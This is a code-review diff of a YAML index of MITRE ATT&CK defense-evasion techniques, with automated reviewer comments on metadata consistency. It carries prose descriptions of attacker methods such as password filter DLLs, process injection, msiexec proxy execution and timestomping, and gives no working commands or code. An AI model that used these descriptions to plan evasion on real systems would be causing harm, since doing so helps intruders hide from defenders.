- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
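Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) disappears from T1556.002 in this hunk with no replacement field, while T1600.001 and T1055.003 further down in this diff keep `- Administrator` and `- User`; if anything consumes that key from this index, it is now populated for only part of the file and that should be called out. Also visible in the context lines: the registry path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages` is separated from its closing `)` by a line break inside the block scalar, so the rendered description carries a newline mid-sentence; that is upstream ATT&CK text and worth reporting there rather than patching here.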
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
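Review bot: `modified` for T1600.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-10-21T22:36:22.369Z`, and the same backward move happens to T1055.003, T1055 and T1205 later in this diff, where every removed value ends in `T14:00:00.188Z`. That pattern looks like upstream dropping bulk re-stamped timestamps rather than the generator reading stale data, but the PR description should name the ATT&CK release the index was regenerated from so a reviewer can confirm that without guessing.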
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
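Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1600.001 at the end of this hunk and nothing within the hunk re-adds it, whereas every other object touched in this diff ends up carrying `3.1.0` or `3.2.0`; confirm the key now appears earlier in the object, otherwise this record is left without a spec version. The retained `x_mitre_permissions_required: - Administrator` just above the removal is also worth a glance, since the same key is dropped from T1556.002 and T1070.006 elsewhere in this diff.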
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
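Review bot: most of this 65-to-75-line hunk is key reordering within T1202 (`description`, `kill_chain_phases`, `x_mitre_detection`, `external_references` and the `x_mitre_*` keys move with their values unchanged), which buries the real delta: Scriptrunner.exe added to the description with three new citations (Bleeping Computer, Secure Team, SS64), `Liran Ravich, CardinalOps` added as contributor, `x_mitre_version` 1.1 to 1.2, and `twitter.com` links replaced by `x.com` with new retrieval dates. If the generator can emit keys in a fixed order, future regenerations of this index would diff cleanly. Also visible: `x_mitre_detection` still cites only `RSA Forfiles Aug 2017` while the description now covers Scriptrunner.exe; that gap is upstream ATT&CK content, not something to fix in this PR.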
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
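Review bot: the block scalar indicator for the T1562 description changes from `|-` (strip) to `|+` (keep), so the value now retains every trailing newline after the last paragraph instead of none; every other description in this diff uses `|-` or a quoted string, so this will be the only description ending in a newline. Unless the generator intentionally mirrors upstream byte-for-byte, normalize to `|-` so consumers that compare or hash description text see consistent values.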
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
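Review bot: the platform list for T1562 drops `Office 365` and gains `Identity Provider` and `Office Suite` (with `x_mitre_version` 1.5 to 1.6), and the T1070.008 hunk further down makes the same swap for `Office 365` and `Google Workspace`; anything in this repo keyed on the old platform names (platform-specific indexes, test filters) needs the corresponding rename, so the PR should state whether that follow-up is included or tracked separately.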
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
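Review bot: the new `Google Cloud Mandiant UNC3886 2024` citation description is a double-quoted string that begins with a space (`" Punsaen Boonyakarn, ...`), which renders as a leading blank in the reference list; trim it in the generator or report it upstream. Pre-existing in the context lines, the `Emotet shutdown` entry dates the post `2022, November 8` while its URL path reads `2022/11/28`; one of the two is wrong and worth an upstream fix.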
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
